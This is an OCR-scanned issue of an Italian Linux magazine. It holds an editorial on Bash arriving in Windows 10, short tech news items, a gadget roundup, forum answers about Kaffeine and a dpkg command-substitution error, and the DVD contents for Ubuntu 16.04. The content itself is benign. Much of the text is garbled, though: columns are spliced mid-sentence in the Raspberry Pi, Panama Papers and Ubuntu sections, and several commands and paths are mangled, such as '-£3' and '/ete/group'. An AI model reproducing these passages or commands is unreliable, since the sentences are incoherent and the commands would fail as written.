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Che ci fa GNU/Linux dentro Windows? 


“Linux è un cancro che si attacca, nel 
senso della proprietà intellettuale, a tutto 
ciò che tocca”. A ricordare le parole dette 
nell'ormai lontano 2001 dall'allora pezzo 
grosso di casa Microsoft Steve Ballmer 
a qualcuno viene quasi da ridere. Grosse 
risate di gusto (almeno per chi da sempre 
preferisce affidarsi al Pinguino) scaturite 
dall'analisi delle mosse che l'azienda di 
Redmond ha attuato negli ultimi anni. 
Quel colosso, tanto colosso forse non lo 
è più, o per lo meno non sente realmen- 
te di esserlo. A dimostrazione di ciò, 
potremmo prendere come esempio il 
progetto Windows Phone, nato in ritardo 
(forse troppo) rispetto ad Android a tal 
punto che, per la prima volta nella storia 
dei sistemi operativi, non è un progetto 
basato su GNU/Linux a rappresentare 
l'alternativa, bensì il contrario. Potremmo 
proseguire poi con il “fallimento” Azure, 
soluzione sì apprezzata da molte aziende 
e professionisti IT, ma non quanto in 
realtà lo siano le piattaforme cloud sulle 
quali c'è il chiaro zampino del Pinguino. 
La (triste?) realtà è che forse in casa 
Microsoft stanno un po' tutti tremando. 

Il mercato dell'informatica non gira più 
unicamente attorno alle soluzioni desktop 
ma, anno dopo anno, il settore mobile 

e server prendono sempre più piede, 
trasformandosi da “contorno” in “piatto 
principale”. Ed ora, gli accordi con i più 
grandi produttori di notebook e desktop 
non servono più di tanto. Ora, è la qualità 
a fare la differenza. Ora, le scosse tellu- 
riche in quel di Redmond incominciano 
davvero a farsi sentire. E cosa s'inventa 
Microsoft per cercare di arginare la 

fuga di utenti? Un'apertura crescente al 
mondo GNU/Linux e all'Open Source. 
Ecco perché i più affezionati al Pinguino 
ridono al ricordo delle parole di Ballmer. 
E da qualche settimana, ridono ancor di 
più. La notizia, che in poche ore ha fatto 
il giro del mondo, è relativa a Bash: con il 
prossimo aggiornamento di Windows 10, 
Microsoft ha annunciato di integrare la 
shell di GNU/Linux sul suo OS proprieta- 
rio. Un po' un controsenso, vero? Che ci 


fa un software Open Source all'interno di 
un OS closed? È un po' come elogiare la . 
natura aperta di Ubuntu, ad esempio, per 
poi trovare il metodo per eseguire nella 
distro la suite d'ufficio proprietaria Office. 
La Bash in Windows 10 è un regalo per 

il quale Microsoft deve ringraziare Mark 
Shuttleworth. Perché Canonical ha deci- 
so di accettare quest'accordo? È la do- 
manda che si fanno un po' tutti gli utenti 
Ubuntu e non solo. | vantaggi per Micro- 
soft sono più che evidenti, ma quelli per 

i sostenitori di GNU/Linux un po' incerti: 
se da un lato è vero che a breve gli utenti 
Windows potranno utilizzare nativamente 
apt-get, SSH e Perl (tanto per citarne 
alcuni), dall'altro è anche vero il Pinguino 
di benefici potrebbe non vederne. C'è chi 
pensa che negli utenti Microsoft, dopo 
aver saggiato la potenza e la comodità, 
di Bash, potrebbe accendersi la voglia di 
GNU/Linux e chi, al contrario, sostiene 
che non troverebbero più un motivo per 
abbandonare l'OS proprietario (anche se, 
di fatto, il gap da colmare non si riduce 
esclusivamente al “semplice” Bash). C'è 
chi pensa che da questa “innovazione” 
di Microsoft potrebbero scaturire nuove 
grandi applicazioni cross-platform che 
non possono che fare bene a GNU/Linux 
e chi invece, vede nella mossa di Shut- 
tleworth un vero e proprio tradimento. 
L'unica certezza è che, alla fine dei conti, 
quelle grosse risate si trasformeranno 
presto in tristezza. Non perché Microsoft 
continuerà a mantenere una posizio- 

ne dominante, ma più semplicemente 
perché la maggior parte degli utenti 
Windows non apprezzerà la presenza 

di Bash: molti non sono abituati ad aver 
a che fare con una finestra del termina- 
le, non ne conoscono le potenzialità e 
forse non hanno neppure l'intenzione di 
imparare ad utilizzarla. Se fosse vero il 
contrario, probabilmente sarebbero già 
utenti GNU/Linux. 


Vincenzo Cosentino 
Invia il tuo commento a: 
redazione@linux-magazine.it 
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Tor: rete malevola per definizione? 


Secondo CloudFlare, la darknet sarebbe usata solo da bot, malware e criminali 


II Una nuova occasione di scontro fra gli utenti 
del “network a cipolla” e le aziende di rete ar- 
riva per opera di CloudFlare, che accusa: “la 
quasi totalità della rete è malevola”. La società 
specializzata in servizi CDN (Content-Delivery 
Network) sostiene che 

nel 94% dei casi, le 

richieste e il traffico dati 

provenienti dall'interno 

di Tor sono intrinseca- 

mente malevoli: non si 

tratta necessariamente 

di utenti o criminali 

singoli, spiega CloudFla- 

re, quanto piuttosto di richieste automatizzate 


progettate per danneggiare i clienti del CDN. Nel 


corso dell'ultimo anno quasi il 70% dei nodi di 
uscita della darknet sono stati classificati come 


spammer di commenti malevoli. Almeno secondo 
CloudFlare. La società sostiene che il monitorag- 


gio dei singoli utenti è complicato e questo non 
fa che confermare indirettamente le capacità di 


protezione dell’anonimato proprie di Tor; per 
quanto riguarda la difesa dai comportamenti 
malevoli poi, CloudFlare ha già approntato diversi 
livelli di reazione che vanno dall'uso di schermi- 
CAPTCHA alla messa al bando totale dell’acces- 
f= so. Quest'ultima opzione 
é è però disponibile solo 
per i clienti enterprise. 
CloudFlare si dichiara 
disposta a discutere 
per trovare un terreno 
comune assieme alla 
( ) community di Tor, ma 
gli sviluppatori della 
darknet non hanno accolto con particolare calore 
le accuse della corporation: CloudFlare si è fatta 
prendere la mano da esigenze di sicurezza fuori 
luogo, dice il team della rete a cipolla, rilasciando 
numeri senza prove sostanziali. 


(4: 


Per informazioni: 
www.edmaster.it/url/5736 


Raspberry Pi: ecco la terza generazione 


Il nuovo modello continua costare come un pranzo in un ristorante economico 


A quattro anni esatti dal 
debutto del primo modello, 
Raspberry Pi ha annunciato 
l'arrivo della nuova generazione 
della board di sviluppo per stu- 
denti, amatori del codice fatto in 
casa e sviluppatori in bolletta. 
Raspberry Pi 3 Model B è signi- 
ficativamente più potente delle 
board di passata generazione, 
aggiunge opzioni di connettività 
nativa e costa esattamente lo 
stesso del modello precedente. 
La nuova Raspberry Pi porta in 
dote il supporto alle connessio- 
ni Bluetooth e Wi-Fi, un'aggiun- 
ta significativa che non richiede 
più di “sacrificare” una o più 
porte USB e di spendere ulterio- 
re denaro su un dongle con cui 
aggiungere le suddette connet- 
tività a posteri. Il SoC Broadcom 
BCM2387 include una CPU ARM 
quad-core Cortex-A53 (64-bit) 


da 1.2 GHz, caratteristica che contare sul fatto che la scheda 
rende Raspberry Pi 3 Model B ha esattamente lo stesso 

10 volte più potente rispetto alla prezzo di sempre (35 dollari). 
board originaria; ulteriori spe- Raspberry Pi 3 Model B è già 


cifiche tecniche comprendono 1 disponibile per l'acquisto presso 
GB di RAM, 4 porte USB, porta i rivenditori Raspberry ufficiali 


HDMI, connettività Ethernet come element14 o RS Compo- 
10/100, Micro SD per il carica- nents, e anche i modelli prece- 
mento del sistema operativo e denti continueranno a essere in 
Micro USB per l'alimentazione. vendita. 
La nuova Raspberry Pi 3 è molto < 3 

3 


più potente e versatile rispetto 
al (recente) passato, e gli ac- 
quirenti interessati 
potranno 


Per informazioni: 
www.edmaster.it/url/5737 


Panama Papers: hack dello scandalo 


Lo studio legale al centro delle rivelazioni denuncia la violazione dei propri mail server 


convertiti in testo e indicizzati per essere esplorati 
dai giornalisti. Mentre lo scandalo dilaga, lo studio 
legale Mossack Fonseca, oltre a gridare alla “cam- 
pagna internazionale contro la privacy” e 
a condannare l'accesso non autorizzato 
a informazioni riservate travisate dai 
giornalisti, ha riferito di aver subito 

un attacco informatico “limitato”. Non I: 
sono stati formulati sospetti per ac- 
certare le responsabilità dell’hack, 


MI È stata descritta come la più grande soffiata 
della storia del giornalismo: 2.6 TB di dati pro- 
venienti dallo studio legale panamense Mossack 
Fonseca, che aprono uno squarcio sulle pratiche 
finanziarie adottate dai potenti, dai famosi e dai 
criminali nei paradisi fiscali. | Panama Papers, 
ha dichiarato lo studio legale nel turbine dello 
scandalo, sono frutto di un’intrusione informa- 
tica. Sono 11,5 milioni i documenti analizzati 
con l'International Consortium of 
Investigative Journalists (IC1J) 

e la collaborazione di 400 
giornalisti: quasi 5 milioni di 
e-mail, oltre 3 milioni di file 
estratti da database, oltre 
2 milioni di PDF, oltre un 
milione di immagini di 
documenti, oltre 320.000 
documenti di testo che 
coprono il periodo tra il 
1977 e la fine del 2015. Organizza- 
ti in cartelle, una per ciascuna delle 
società offshore gestite, sono stati 


SERENUENIE 
| in Windows 10 


Micrc 


ma sono state avviate delle 

indagini e delle denunce, 

a giudicare da una e-mail 
apparentemente inviata ai 
clienti dello studio legale 
nei giorni precedenti alle 
rivelazioni sui media: nella 
comunicazione si anticipa 
l'esplosione del Panama 
Leak. 


Per informazioni: 
www.edmaster.it/url/5448 


Vivaldi: browser alternativo e maturo 


Prima “main release” per il browser anticonformista nato dall'ex CEO di Opera 


MI Dopo un anno passato nel 
purgatorio delle release inter- 
medie, Vivaldi è ora finalmente 
disponibile nella sua prima 
versione destinata al pubblico 
generalista: Vivaldi 1.0 è un 
browser progettato come solu- 
zione alternativa per gli utenti 
che non si sentono a proprio 
agio con la “chromizzazione” 
spinta di Mozilla Firefox. Non 
che Vivaldi non abbia nulla a 
che fare con Chrome, beninte- 
so: il browser creato dagli ex di 


Opera (incluso il CEO Jon von 
Tetzchner) usa lo stesso layout 
engine del navigatore di Google 
(Blink) ed è compatibile con le 
relative estensioni accessibili 
su Play. Il resto dell'offerta, 
però, è tutta farina del sacco del 
nuovo team. Il nuovo browser 

è progettato prima di tutto 

per adattarsi alle esigenze 
specifiche dei “power user”, 
categoria di utenti avanzati 

che per Tetzchner e colleghi 

è oramai poco considerata da 


VIVALDI 


A new browser for our friends 


DOWNLOAD TECH PREVIEW 


Mozilla, Google e compagnia. Le 
funzionalità di Vivaldi 1.0 inclu- 
dono il raggruppamento delle 
schede in “stack”, il salvataggio 
delle sessioni per un ripristino 
successivo, la raccolta di note 

e screenshot sulle pagine Web, 
un'interfaccia di comandi te- 
stuali per l'accesso veloce alle 
varie opzioni, una schermata 
Speed Dial e molto altro. Diver- 
samente dagli altri browser, 
Vivaldi tende a fornire un gran 
numero di personalizzazioni 
senza dover ricorrere agli 
add-on esterni. Ed ora, ilteam 
di Vivaldi si ritiene finalmente 
soddisfatto del livello di maturi- 
tà raggiunto dal software. 


Per informazioni: K 
www.edmaster.it/url/5739 tag 
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WhatsApp è tutto cifrato! 


L'applicazione di messaggistica ora offre cifratura end to end per tutti i contenuti 


Game Bov? 


\ {1} F ti Sp Der, d' È 


BI Con l'ultimo aggiornamento 
di WhatsApp, un miliardo di 
persone intratterranno con- 
versazioni cifrate, si scambie- 
ranno contenuti inaccessibili 

a terzi, potranno effettuare 
chiamate vocali non intercet- 
tabili: l'applicazione 

di messaggistica di 

proprietà di Facebo- 

ok ha annunciato di 

aver implementato 

appieno il sistema di 

cifratura end to end 

già parzialmente in- 

trodotto nel 2014 per dispositivi 
Android e per i soli messaggi 
fra due interlocutori. “Nessuno 
può accedere ai contenuti dei 
messaggi. Non i cybercrimina- 
li. Non gli hacker. Non i regimi. 
Nemmeno noi.”: WhatsApp, 
nel portare avanti un piano già 


in programma da tempo, pone 
l'accento sull'attualità e sulle 
responsabilità che anche i go- 
verni fanno ricadere sui gestori 
di piattaforme di comunicazio- 
ne che potrebbero veicolare 
comunicazioni preziose per 


WhatsApp 


indagini di ogni tipo. “Ogni gior- 
no sentiamo notizie a proposito 
di dati rubati o a cui si è fatto 
accesso impropriamente e se 
non si agisce, sempre più infor- 
mazioni digitali delle persone e 
sempre più comunicazioni sa- 
ranno vulnerabili agli attacchi 


negli anni a venire”. WhatsApp 
confida dunque nella cifratura 
end to end e nel protocollo 
Signal della Open Whisper 
Systems. EFF, che da tempo 
gestisce il Secure Messaging 
Scorecard per illustrare agli 
utenti gli aspetti più 
importanti che un 
servizio di messag- 
gistica dovrebbe 
garantire per esse- 
re definito sicuro, 
ha aggiornato la 
propria valutazione 
rispetto a WhatsApp: a lasciare 
spazio a dubbi resta la natura 
proprietaria del codice dell’ap- 
plicazione, nonostante il codice 
di Signal sia FOSS. 


Per informazioni: 
www.edmaster.it/url/5740 


Microsoft nella Eclipse Foundation 


Redmond annuncia l’entrata nella fondazione FOSS e la distribuzione dei primi plug-in 


MI Microsoft “omaggia” 
ancora l'Open Source 
ed entra nella Eclipse 
Foundation, orga- 
nizzazione respon- 
sabile della gestione 
dell'omonimo progetto 
di ambiente di sviluppo integrato (IDE) FOSS votato 
alla personalizzazione tramite l'utilizzo di plug-in 
esterni. La corporation di Redmond, oramai 
pienamente convertita al business cloud di Azure, 
intende favorire la collaborazione tra sviluppa- 
tori tramite Eclipse e ha già distribuito il codice 
dei primi plug-in: Team Explorer Everywhere 
permette di integrare Team Foundation Server 

o Visual Studio Team Services su Eclipse. Visual 
Studio Team Services offre inoltre il supporto per 
Codenvy, estensione che permette di generare 

un ambiente di lavoro Eclipse “on-demand” e di 
impostare velocemente la virtual machine relati- 
va; neanche a dirlo, l'utilizzo delle VM Codenvy su 
Azure è permesso e incoraggiato. Microsoft con- 


eclipse 


tinua a estendere la collaborazione con il mondo 
dell'Open Source nella speranza che gli sviluppa- 
tori si convertano al cloud di Azure, magari pagan- 
do con denaro sonante uno dei servizi disponibili 
sulla piattaforma. Il nuovo approccio “inclusivo” 

e cloud-centrico di Satya Nadella al business di 
Redmond piace anche a Bill Gates, filantropo e 
uomo più ricco del mondo part-time che parla di 
una Microsoft finalmente disposta a cambiare in 
accordo con i tempi. | tempi in cui il management 
della corporation considerava GNU/Linux un “can- 
cro” sono definitivamente alle spalle? 


Per informazioni: 
www.edmaster.it/url/5741 


Linux gadget e prodotti 


Periferiche, accessori e altri dispositivi per lavorare e divertirsi nel tempo libero 


Chi di noi non dispone almeno di due smartphone ed un ta- 
blet? Il vero problema è, quando viene sera, trovare il metodo 
per caricarli senza far partire una caccia alla presa libera. 

A risolvere questo incoveniente c'è I-CHARGE-ZENTREE, una 
docking station equipaggiata con 4 differenti porte USB di 
ricarica. Ognuna di queste, offre una corrente di uscita pari a 
2.4A, sufficiente per ricaricare qualsiasi smartphone o tablet 
attualmente in circolazione. 


È il gadget perfetto per entrare senza spendere una 
fortuna nel magico mondo della realtà aumentata. Tutto 
quello che dobbiamo fare è posizionare il nostro smart- 
phone (con diagonale del display non superiore ai 5,5”) 
nell'altoggiamento interno ed incominciare a guardare 
film in 3Doa giocare con i numerosi titoli compatibili 
con la tecnologia VR presenti nel Play Store. 
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SAMSUNG 


Se la velocità di trasferimento è la nostra prerogativa, buttiamo 
via le “vecchie” pendrive USB e gli hard disk portatili: facciamo 
largo alle nuove soluzioni SSD da taschino come il Samsung 
MU-PS250B. Dalla capacità di 250 GB (ma è disponibile anche 
una variante più costosa che offre ben 1 TB di spazio), è infatti 
in grado di offrirci una velocità di trasferimento fino a 450 MB/s 
(utilizzando un'interfaccia USB che segue lo standard 3.0). 


È l'accessorio ideale per trasformare il famoso mini PC in un 
vero e proprio sistema da portare sempre in giro nel taschi- 
no. Questo display touchscreen, infatti, ci permette di rea- 
lizzare i progetti più disparati: un palmare, uno smartphone 
con tanto di modulo telefonico o un player multimediale per 
riprodurre in mobilità film e musica. La diagonale è di 3,5” e 
la risoluzione è di 320x480 pixel. 


Vogliamo incrementare la sicurezza della nostra abitazione? 
Quello che ci serve è una IP-cam capace non solo di video- 
sorvegliare l'ambiente nel quale è posizionata, ma anche di 
informarci non appena qualche intruso viene rilevato. Questo 
modello, offre una risoluzione 640x480 pixel, più che decente 
per avere una visione chiara di ciò che accade nei nostri spazi. 
Inoltre, grazie alla presenza di 
LED ad infrarossi, è in grado 
di regalare immagini 

nitide anche al buio. 


Abbiamo la necessità di ripetere un segnale audio/video 

HDMI? Questo è l'accessorio che fa per noi. Basta infatti 

inserire il cavo HDMI da un lato e dall'altro per amplificare 
il segnale e riuscire così a trasmettere fino ad una distan- 
za massima di 30 metri (se il segnale è Full HD). Supporta 
anche i flussi video 3D e 4K. Grazie al 
ricevitore con equalizzazione fino a 40 
dB è la soluzione ideale anche per 
abbattere i limiti dei cavi eco- 
nomici e che, in genere, 
non offrono grande 
qualità.a. 


Gli speaker bluetooth, interfacciati al nostro smartphone An- 
droid, sono il gadget del momento. Peccato, però, che la mag- 
gior parte delle soluzioni disponibili in commercio non siano in 
grado di regalare bassi da capogiro. Ma non è il caso di questo 
modello prodotto da LogiLink. Oltre ai due classici altoparlanti 
(da 2 W), infatti, è presente anche un subwoofer (7W) che ren- 
derà più piacevole l'ascolto dei nostri brani preferiti. 


Grazie al piccolo ricevitore USB 2.4 GHz, questa tastiera com- 
patta è la soluzione ideale per comandare più comodamente 
un media player piazzato in salotto, un PC o una smartTV com- 
patibile. In appena 15 cm di lunghezza e 10 di altezza, avremo 
a disposizione una completa tastiera QWERTY con tanto di 
touchpad e tasti multimediali programmabili dall'utente. Nella 
confezione è inclusa anche una batteria al litio ed un cavo USB 
di ricarica. 


esse 
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DAL FORUM 


WWW.LINUX-MAGAZINE.IT 


SOLUZIONI DAL FORUM 


Ogni mese i thread più gettonati estratti nelle diverse discussioni dal forum di GNU/Linux 
Magazine. Se non fate ancora parte della nostra squadra, iscrivetevi subito e contribuite 
alla crescita del movimento Open Source. Il nostro sito è pronto ad ospitare esperti, neofiti 
o semplicemente chi ne vuole sapere di più a proposito di GNU/Linux e del Software Libero 


Distribuzioni/Slackware 


KAFFEINE E | CANALI TV 


DOMANDA» Ciao a tutti, sul mio PC desktop ho installato il pacchetto 
w_scan, ma nonostante tutto non vi è modo di fare la scansione dei canali 
con Kaffeine perché l'opzione Avvia scansione è disabilitata (Fig. 1). Il ker- 
nel riconosce senza problemi la pinnacle PCTV USB. Lo stesso software 
con la stessa scheda USB che è in uso anche su PCLinuxOS in ambiente 
KDE e tutto funziona alla perfezione. Probabilmente in Slackware com- 
metto qualche errore 0 c'è qualcosa, ad esempio nella configurazione, che 
non fa funzionare a dovere Kaffeine. Aspetto vostri suggerimenti. 


SOLUZIONE * Il problema è riportato dall'utente francesco bat. Per coloro 
che non lo conoscessero, Kaffeine (www.kde.org/applications/multimedia/ 
kaffeine/) è un lettore multimediale per KDE con supporto per la TV digitale. 
Nel forum sono state fornite due possibili soluzioni: la seconda si è rivelata 
quella vincente. Ma procediamo con ordine. Il programma w_scan (http:/ 
wirbel.htpc-forum.de/w_scan/index2.html) è un'utility a linea di comando 
che esegue la scansione delle frequenze per le trasmissioni DVB (Digital Vi- 
deo Broadcasting) è dello standard ATSC (Advanced Television Systems 
Committee). Il primo metodo allora potrebbe essere quello di effettuare la 
scansione e quindi a creare un file dei canali, con w_scan : 


w_scan -c IT -k -t 2 -R 0 -E 0 -0 0 > scanfile.dvb 


Cod ide 


N Fig. 1 + Il pulsante Avvia scansione presente all'interno del 
menu Televisione — Canali 
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quindi, sostituirlo a quello di Kaffeine presente in /home/utente/\kde4/share/ 
apps/kaffeine/. Ma non è sufficiente perché Kaffeine ad ogni avvio crea, in 
genere, un nuovo file sovrascrivendo quello presente. Allora occorre “proteg- 
gere” il file creato con w_scan cambiandone l'attributo 


chattr +i /home/nome_utente/.kde4/share/apps/ 1 
kaffeine/scanfile.dvb 


Il comando chattr permette di impostare gli attributi speciali. Come primo 
argomento accetta una stringa che identifica quali attributi attivare/disattivare 
e come argomenti successivi una lista di file (man chattr). Nello specifico, 
viene attivato (opzione +i) il cosiddetto immutable flag per il quale il file 
non può essere cancellato o rinominato tanto meno modificarne il contenuto. 
Solo l'amministratore può attivare/disattivare questo attributo. Nello specifico 
tale suggerimento non ha portato alla risoluzione del problema, ma un'osser- 
vazione dell'utente francesco bat ha condotto sulla strada giusta: “Se lancio 
Kaffeine da root posso gestire senza nessun problema il dispositivo!”, Allora 
la soluzione ha visto l'aggiunta dell'utente al gruppo video nel file /ete/group: 
al riavvio Kaffeine ha mostrato l'opzione di scansione abilitata. 


La rivista/Articoli 
UN COMANDO CHE NON FUNZIONA? 


Domanda * Possibile errore o non comprensione del comando in Linux 
Magazine 162 (Agosto/Settembre 2015)? Ho letto la rivista in oggetto alla 
pagina 61, dove viene riportato un comando da shell per eliminare confi- 
gurazioni di programmi non più utilizzati. Al secondo passo del secondo 
tutorial sembra che il comando dia un errore, o almeno a me dà errore 
(Fig. 2). Dov'è il punto che non comprendo? 


SOLUZIONE » Prima di riportare la soluzione facciamo una premessa al 
fine di rinfrescare la memoria. La shell Bash (Www.gnu.org/software/bash, 
ma ve ne sono diverse, ad esempio in /etc/shells è possibile leggere, con il 
comando cat /ete/shells, l'intero percorso di un certo numero di shell di login 
valide), è un interprete di comandi che permette all'utente di comunicare con 
il sistema operativo previo uso di un certo numero e tipo di comandi prede- 
finiti e non. In altre parole la shell è un programma molto complesso che 
consente all’utente di lanciare i vari programmi che si vogliono utilizzare e 
l'uso come interprete della riga di comando è solo uno dei possibili modi di 
utilizzo. Agli utenti, in alcuni casi, potrebbero mancare i necessari dettagli 
delle modalità attraverso le quali espletare queste funzioni incorrendo così 


alberto@Hal9001: - 


alberto@Hal9001:-$ sudo dpkg --purge'dpkg -l | egrep 
[sudo] password for alberto: 
dpkg: errore: opzione --purgedpkg -l | egrep "Arc" | cut -d 
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"Arc? =f-cute=d-*-=f3° 


-f3 sconosciuta 


usare dpkg --help per un aiuto sull'installazione e la rimozione dei pacchetti [ 


*]. 


Usare 


"apt" o "aptitude" per un'interfaccia alla gestione dei pacchetti. 


Usare dpkg -Dhelp per l'elenco delle opzioni di debug per dpkg. 
usare dpkg --force-help per l'elenco delle opzioni di forzatura. 
usare dpkg-deb --help per un aiuto sulla manipolazione dei file *.deb. 


Le opzioni indicate con [*] producono output prolisso - creare una pipe con "les 


" 


s" o "more". 
alberto@Hal9001:-S 


N Fig. 2 è L'immagine dell'errore riportata dall'utente 


in errori all'apparenza non comprensibili. Accenniamo allora nel seguito le 
modalità attraverso le quali la shell legge una riga da tastiera e come sia in 
grado di riconoscere il programma che si vuole eseguire nonché ricostruire 
gli argomenti che si vogliono passare e infine eseguire il tutto. Una generica 
invocazione per l'esecuzione di un comando, o più in generale di un program- 
ma, vede la seguente sintassi: 


nome programma --opzionel valore -opz2 argl arg2 


Di base è prevista la scrittura all’inizio della riga (eventuali spazi antistanti 
verranno ignorati) di ciò che si vuole eseguire, seguito da eventuali opzioni 
e/o argomenti. Il punto dal quale non è possibile prescindere è che la shell, per 
identificare il comando e separarlo da opzioni e/o argomenti, e separare questi 
ultimi fra di loro, usa caratteri vuoti come lo spazio o i caratteri di tabulazione. 
Pertanto, la presenza di uno o più spazi o tabulatori dice che si sta passando, ad 
esempio, dal nome del comando ad un argomento o opzione, 0 da un argomen- 
to/opzione al successivo. Questo è il motivo per cui i nomi dei comandi non 
contengono spazi. Se un comando è troppo lungo si può continuare sulla linea 
successiva previo utilizzo del carattere "\" (backslash). Ad esempio: 


comando -a -b argl arg2 \ 


arg3 --nome_file=xyz 


In genere, la maggior parte dei comandi usa nomi scritti in lettere minuscole (i 
sistemi Unix/Unix-like sono case sensitive ovvero fanno differenza tra lettere 
minuscole e maiuscole). I pochi caratteri non alfabetici utilizzati nei nomi dei 
comandi sono il carattere “-” (dash) e “_”’ (underscore) ed eventualmente i 
numeri. Infatti, gran parte degli altri caratteri hanno significati specifici che 
esulano, però, da questa breve premessa. Aggiungiamo che la differenza fra 
opzioni e argomenti è che le prime attivano funzionalità o modalità di ope- 
razione specifiche del comando, mentre i secondi indicano gli oggetti, solita- 
mente dei file, su cui il comando (o il programma) andrà ad operare. Terminata 
la scrittura della riga faremo seguire la pressione del tasto Invio che “scariche- 


rà” nel buffer la linea scritta in modo che questa possa essere letta in ingresso 
dal programma che usa il terminale (nel nostro caso, la shell). Quello che in 
effetti fa la shell è identificare il programma da usare sulla base del nome del 
comando (per i percorsi viene utilizzata la variabile d'ambiente PATH e echo 
$PATH ne mostra il contenuto), per poi spezzare l'intera riga in una lista di 
stringhe che verranno passate al suddetto programma come argomenti. Que- 
sta scansione viene eseguita su tutta la riga, utilizzando gli spazi vuoti come 
separatori e senza distinguere fra nome del comando, opzioni e argomenti; 
tutto il contenuto sarà suddiviso in una lista di stringhe, che poi il programma 
richiamato analizzerà al suo interno. Ciò è ottenuto grazie alla variabile d'am- 
biente IFS (Internal Field Separator) la quale è utilizzata per istruire la shell 
alla lista di separatori nei risultati di una espansione: di default è proprio uno 
spazio vuoto (si può verificarlo con echo $IFS). Fatta questa breve premessa, 
arriviamo alla domanda posta dall'utente willer11. Come visibile dalla Fig. 2 
c'è proprio un problema di spazio nella riga di comando digitato dall'utente. 
Infatti il comando è: 


sudo dpkg --purge “dpkg -1 | egrep "*rc" | cut -da 1 
Vegan 


laddove si può notare, ad esempio, uno spazio tra il comando sudo e il 
programma dpkg che si vuole richiamare così come tra il programma e 
la prima opzione --purge. Sono questi spazi che permettono alla shell di 
creare la giusta lista di cui sopra. Il simbolo "°" (backtick, apice inverso) si 
ottiene con la combinazione dei tasti Alt Gr+?. Il backtick nella shell (così 
come negli script shell) definisce la cosiddetta sostituzione di comando: 
in sostanza tutto ciò che è compreso tra i due apici inversi viene valutato 
e solo dopo viene assegnato al comando successivo, nello specifico dpkg 
--purge. Analogo modo per ottenere una sostituzione di comando è l'uso 
delle parentesi tonde con il simbolo “$”. Il comando precedente tra apici 
inversi è del tutto equivalente al seguente: 


$(dpkg -1 | egrep "*rc" | cut -d ' ' -£3) 


0°e0e 
ecee 
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Distribuzioni 
UBUNTU 16.04 LTS 
on cadenza biennale, gli sviluppatori di casa Canonical tante novità è il pensionamento di Ubuntu Software Center, il 
rilasciano una nuova release con supporto a lungo termine gestore dei pacchetti che Canonical aveva tanto osannato al 
(LTS) della distro più amata dagli utenti del Pinguino: Ubuntu. momento del suo primo lancio. L'installazione e la rimozione di 
Questa volta, i vertici dell'azienda hanno deciso di battezzare la nuovi pacchetti è ora affidata a GNOME Software, decisamente 
release 16.04 con il nome in codice di Xerial Xerus. Cosa c'è di più stabile e performante. Sono stati poi aggiornati tutti i softwa- 
nuovo? Beh, il team Canonical ha deciso di darsi alle pulizie di re più importanti (LibreOffice e Mozilla Firefox in primis) ed il 
primavera, eliminando Brasero e Empathy, due software poco kernel Linux è il 4.4. Se vogliamo scoprire di più sulle novità di 


apprezzati dagli utenti. Tuttavia, chiunque volesse continuare ad —Ubuntu 16.04LTS, a pag. 64 di questo numero di Linux Magazine 
‘utilizzarli può comunque installarli manualmente. Altra impor- è presente il nostro consueto approfondimento speciale. 


ubuntu 16.04 LTS 


Nome dispositivo | vincenzoiM 
Memoria 4558 
Processore intel’ Core” i7-6500U CPU © 2.50GHz x2 
Grafica. Gallium 0.4on llvmpipe (LLVM 3.8, 256 bits) 
Tipo os 64bit 
Disco 16,4GB 


installa aggiornamenti 


Xubuntu 16.04 LTS, Lubuntu 16.04 LTS 


COME UTILIZZARE IL DVD-ROM 


Le distribuzioni principali presenti all'interno del DVD-Rom sono direttamente avviabili dal supporto digitale, quindi installabili o 
eseguibili in modalità LIVE. Basta inserire il DVD-Rom nell'apposito lettore e riavviare il PC. Dopo pochi secondi apparirà l'inter- 
faccia per l'avvio della distribuzione o per la sua esecuzione in modalità LIVE. Per tutte le altre basta seguire le seguenti istruzioni. 


e Me /jjmedia/backup/Distribuzioni/twi-10149-b/distribuzioni/ 


Indice di /media/backup/Distribuzioni/dvd-10-149-b/distribuzioni/ 


Nome Dimensioni —Data ultima modifica 
fi [directory principale] 
Kuburntu-12.04.3 2008/13 12:25:57 
Ubuntu-12.04.3) 20/08/13 12:30:01 


L'INTERFACCIA DOWNLOAD ISO 

Per le distribuzioni disponibili sotto forma di immagini ISO, apriamo il Da qui, possiamo scaricare l'immagine ISO della distribuzione semplice- 
DVD-Rom con il file manager e clicchiamo due vole sul file index.htm. mente accedendo alla sua eventuale cartella e premendo sul relativo link. 
A questo punto, dovrebbe apparire l'interfaccia di gestione. Clicchiamo Dopodiché, possiamo masterizzare l'IS0 su Cd-Rom e DVD-Rom per crea- 
sull'illustrazione o sulla voce Distribuzioni presente nel menu a destra. re il supporto di installazione o trasferirla su una pendrive USB bootable. 
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KUBUNTU 16.04 LTS 


} 


i sa, accanto alla “main distro” Ubuntu, sono rilasciate 

una serie di derivate (supportate ufficialmente e non) 
che accontentano quegli utenti che preferiscono non affi- 
darsi all'ambiente desktop predefinito della distro di casa 
Canonical, Unity. E fra le varianti disponibili, da sempre, 
Kubuntu è quella più gettonata. L'ambiente desktop KDE, 
infatti, è definito da molto più comodo di Unity, GNOME e tutti 
gli altri DE disponibili. Alla fine, però, è sempre una questione 
di gusti ed abitudini. Kubuntu 16.04 LTS porta con sé una serie 


etDE Framemonts $ 18.9 
SI OR SS$1 finali agamnat 55.1) 
I UZSA O The sd ardomeg sy 


OX en: <M a gra*z i°n e 


di aggiornamenti che vanno a rinfrescare il software integrato. 
Tralasciando il kernel Linux (come Ubuntu 16.04 LTS si mostra 
nella sua release 4.4), gli sviluppatori hanno aggiornato il pac- 
chetto applicazioni di KDE (KDE Applications) alla versione 
15.12 ed anche Plasma Desktop. Non potevano poi mancare le 
nuove versioni di LibreOffice e Mozilla Firefox, due delle appli- 
cazioni disponibili out of the box più utilizzate dagli utenti. In 
definitiva, trattandosi di una release LTS, l'aggiornamento è 
altamente consigliato. 


et P - 454PM 


Ubuntu GNOME 16.04 LTS, Ubuntu MATE 16.04 LTS 


Creare un nuovo progetto: Progetti recenti: 


im-13&iso 
Mageia-2-536-0VD.iso 


Progetto audio 
+ Crea unCDaudio tradizionale 
KNOPPIX_V7.0.1DVD-2012-05-24-EN 


Progetto dati im-137-b.iso 


Ì Crea un CD 0 DVD di dati 
na linuxmint-13-mate-drd-32bit iso 


Progetto video 
Lu Crea un DVD video o un SVCD 


TN Copia disco 
i Chea una copia 1:21 di un COIDVD 

è Masterizza immagine 

") Masterizza un'immagine CDYDVD esistente su disco 


MASTERIZZAZIONE SUPPORTI 


In ambiente Gnome possiamo utilizzare Brasero, su KDE K3b. Nel primo 
